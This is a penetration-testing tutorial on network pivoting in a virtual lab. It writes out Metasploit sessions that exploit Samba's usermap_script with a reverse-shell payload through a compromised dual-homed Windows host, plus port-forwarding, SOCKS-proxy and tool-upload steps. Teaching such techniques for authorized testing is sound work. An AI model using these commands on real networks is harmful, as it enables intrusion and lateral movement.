🔐 Network Pivoting in Ethical Hacking

A Comprehensive Guide to Advanced Penetration Testing Techniques

📋 Introduction to Network Pivoting

Network pivoting is an advanced penetration testing technique that allows ethical hackers to access and compromise systems that are not directly reachable from their attacking machine. This method uses a compromised system as a "pivot point" or "stepping stone" to reach other systems within internal networks that would otherwise be inaccessible.

Key Concept: Pivoting transforms a compromised machine into a bridge between the attacker's network and an isolated target network, enabling lateral movement within the infrastructure.

🎯 Understanding the Pivoting Scenario

Network Topology Overview

Attacker Network (NAT)
Kali Linux
(Attacker)
Windows 10
(Compromised)
Target Network (Bridged)
Windows 10
(Pivot Point)
Metasploitable
(Target)
iPhone
Other Device

The Windows 10 machine acts as the pivot point, connecting two separate networks

Network Configuration:
  • Kali Linux: Connected to NAT network (10.20.14.x)
  • Windows 10: Dual-homed with two network adapters (NAT + Bridged)
  • Metasploitable: Connected only to Bridged network (10.20.15.x)
  • Target: Metasploitable is invisible to Kali but visible to Windows 10

⚙️ Virtual Machine Network Configuration

Kali Linux Configuration

The Kali Linux machine remains on the NAT network. This is the standard configuration used throughout penetration testing to gain initial access to target systems.

Network Adapter: NAT (Default)
Purpose: Initial attack vector

Windows 10 Configuration (Pivot Machine)

The Windows 10 machine requires two network adapters to function as a pivot point. This dual-homed configuration allows it to bridge between the attacker's network and the isolated target network.

Adapter 1: NAT (connects to Kali network)
Adapter 2: Bridged (connects to target network)
Purpose: Acts as network bridge/pivot point

Metasploitable Configuration (Target)

The Metasploitable machine is configured with only a Bridged network adapter, making it unreachable from the Kali Linux machine directly.

Network Adapter: Bridged
IP Address: 10.20.15.4
Purpose: Isolated target system

🔍 The Pivoting Process

Phase 1: Initial Access Attempt (Failure)

First, we demonstrate that direct exploitation fails because the target is not visible from the attacker's network.

msf6 > sessions -l Active sessions: Id Name Type Information Connection 1 meterpreter x86 NT AUTHORITY\SYSTEM 10.20.14.x -> 10.20.14.y msf6 > use exploit/multi/samba/usermap_script msf6 exploit(usermap_script) > set RHOST 10.20.15.4 msf6 exploit(usermap_script) > set PAYLOAD cmd/unix/reverse msf6 exploit(usermap_script) > exploit [-] Exploit failed: Rex::ConnectionTimeout The connection timed out
⚠️ Why This Fails: The Kali Linux machine cannot establish a network connection to the Metasploitable device because they exist on completely different network segments with no routing between them.

Phase 2: Network Discovery

Next, we investigate the compromised Windows machine to identify additional network interfaces that might provide access to other networks.

msf6 > sessions -i 1 [*] Starting interaction with session 1... meterpreter > ifconfig Interface 4 ============ Hardware MAC: 00:0c:29:xx:xx:xx IP Address : 10.20.14.5 Netmask : 255.255.255.0 Interface 7 ============ Hardware MAC: 00:0c:29:yy:yy:yy IP Address : 10.20.15.5 Netmask : 255.255.255.0
✓ Discovery Success: The Windows machine has two network interfaces. Interface 7 (10.20.15.5) is on the same subnet as our target Metasploitable machine (10.20.15.4), providing our pathway to pivot.

Phase 3: Establishing the Route (Autoroute)

Using Metasploit's autoroute module, we establish a route through the compromised Windows machine to reach the target network.

meterpreter > background [*] Backgrounding session 1... msf6 > use post/multi/manage/autoroute msf6 post(autoroute) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- CMD autoadd yes Specify the autoroute command NETMASK 255.255.255.0 no Netmask for subnet SESSION yes The session to run this module on SUBNET no Subnet (IPv4, for example, 10.10.10.0) msf6 post(autoroute) > set SESSION 1 msf6 post(autoroute) > set SUBNET 10.20.15.0 msf6 post(autoroute) > exploit [*] Running module against DESKTOP-XXXXXX [*] Searching for subnets to autoroute. [+] Route added to subnet 10.20.15.0/255.255.255.0 from host's routing table. [*] Post module execution completed

Routing Flow Diagram

Kali Linux
10.20.14.x
Windows 10
10.20.14.5
Windows 10
10.20.15.5
Metasploitable
10.20.15.4

Traffic flows through the compromised Windows machine to reach the isolated target

Phase 4: Successful Exploitation Through Pivot

With the route established, we can now successfully exploit the target system through the pivot point.

msf6 > use exploit/multi/samba/usermap_script msf6 exploit(usermap_script) > set RHOST 10.20.15.4 msf6 exploit(usermap_script) > set PAYLOAD cmd/unix/reverse msf6 exploit(usermap_script) > exploit [*] Started reverse TCP handler on 10.20.14.x:4444 [*] Command shell session 2 opened id uid=0(root) gid=0(root) uname -a Linux metasploitable 2.6.24-16-server #1 SMP i686 GNU/Linux pwd /root ls Desktop vnc.log
✓ Exploitation Success: We have achieved root-level access on the Metasploitable target through the pivot. All commands now execute on the target system, demonstrating complete compromise.

📊 Comparison: Direct vs. Pivoted Attacks

Aspect Direct Attack Pivoted Attack
Network Visibility Target must be on same network or routable Target can be on isolated network
Prerequisites Direct network access Compromised pivot machine required
Complexity Simple, single-step Multi-stage, requires routing
Detection Risk Higher (direct connection) Lower (traffic appears internal)
Tool Availability All tools available Limited to uploaded tools or Metasploit modules
Real-World Scenario External perimeter testing Internal network penetration

🛠️ Alternative Pivoting Techniques

1. Manual Tool Upload Method

Instead of using Metasploit's routing capabilities, you can manually upload scanning and exploitation tools to the compromised pivot machine.

meterpreter > upload /usr/bin/nmap C:\\Tools\\nmap.exe [*] uploading : /usr/bin/nmap -> C:\Tools\nmap.exe [*] uploaded : /usr/bin/nmap -> C:\Tools\nmap.exe meterpreter > shell C:\> nmap -sV 10.20.15.0/24

2. Port Forwarding

Forward specific ports from the target network through the pivot machine to your attacking machine.

meterpreter > portfwd add -l 8080 -p 80 -r 10.20.15.4 [*] Local TCP relay created: :8080 <-> 10.20.15.4:80

3. SOCKS Proxy

Establish a SOCKS proxy through the Meterpreter session for more flexible routing.

msf6 > use auxiliary/server/socks_proxy msf6 auxiliary(socks_proxy) > set SRVPORT 1080 msf6 auxiliary(socks_proxy) > set VERSION 4a msf6 auxiliary(socks_proxy) > run

⚡ Best Practices and Recommendations

Security Considerations

  • Minimize Tool Upload: Uploading tools to compromised systems increases detection risk and leaves forensic evidence. Use built-in tools or Metasploit modules when possible.
  • Maintain Session Stability: Keep your pivot session stable and establish backup sessions in case the primary connection is lost.
  • Clean Up Routes: Remove autoroutes when finished to avoid leaving persistent backdoors.
  • Document Everything: Keep detailed records of all pivoting routes and compromised systems for reporting and cleanup.

Legal and Ethical Warnings

  • Only perform pivoting attacks in authorized penetration testing engagements
  • Ensure your scope of work explicitly covers internal network testing
  • Obtain written permission before accessing systems through pivot points
  • Be aware that pivoting can affect production systems and network performance

🎓 Key Takeaways

Essential Concepts to Remember:
  1. Pivoting enables access to isolated networks by using compromised systems as bridges
  2. Dual-homed machines (systems with multiple network interfaces) make ideal pivot points
  3. Metasploit's autoroute module simplifies routing configuration for pivoting attacks
  4. Network reconnaissance on compromised systems reveals additional attack surfaces
  5. Multiple pivoting methods exist, each with different use cases and advantages
  6. Stealth and operational security are crucial when conducting pivoted attacks

📚 Further Learning Resources

To deepen your understanding of network pivoting and lateral movement techniques, consider exploring:

Practice Makes Perfect: Set up your own lab environment with multiple network segments to practice these techniques safely. Experiment with different network topologies, operating systems, and exploitation scenarios to build practical experience.